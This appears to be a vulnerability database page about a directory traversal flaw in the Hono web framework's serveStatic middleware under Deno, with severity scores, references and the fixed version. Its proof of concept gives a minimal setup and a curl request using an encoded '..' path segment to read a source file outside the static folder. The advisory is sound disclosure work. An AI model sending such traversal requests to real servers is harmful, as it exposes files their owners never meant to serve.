Lucene search

GoogleOSV:GHSA-3MPF-RCC7-5347

HistoryApr 23, 2024 - 4:20 p.m.

Hono vulnerable to Restricted Directory Traversal in serveStatic with deno

2024-04-2316:20:49

Google

osv.dev

servestatic

deno

directory traversal

security

software

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

0.0004 Low

EPSS

Percentile

10.6%

JSON

Summary

When using serveStatic with deno, it is possible to directory traverse where main.ts is located.

My environment is configured as per this tutorial
https://hono.dev/getting-started/deno

PoC

$ tree
.
├── deno.json
├── deno.lock
├── main.ts
├── README.md
└── static
    └── a.txt

source

import { Hono } from 'https://deno.land/x/[email protected]/mod.ts'
import { serveStatic } from 'https://deno.land/x/[email protected]/middleware.ts'

const app = new Hono()
app.use('/static/*', serveStatic({ root: './' }))

Deno.serve(app.fetch)

request

curl localhost:8000/static/%2e%2e/main.ts

response is content of main.ts

Impact

Unexpected files are retrieved.

CPENameOperatorVersion
honolt4.2.7

CPE	Name	Operator	Version
	hono	lt	4.2.7

References

github.com/honojs/hono

github.com/honojs/hono/commit/92e65fbb6e5e7372650e7690dbd84938432d9e65

github.com/honojs/hono/security/advisories/GHSA-3mpf-rcc7-5347

nvd.nist.gov/vuln/detail/CVE-2024-32869

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

0.0004 Low

EPSS

Percentile

10.6%

JSON

Related for OSV:GHSA-3MPF-RCC7-5347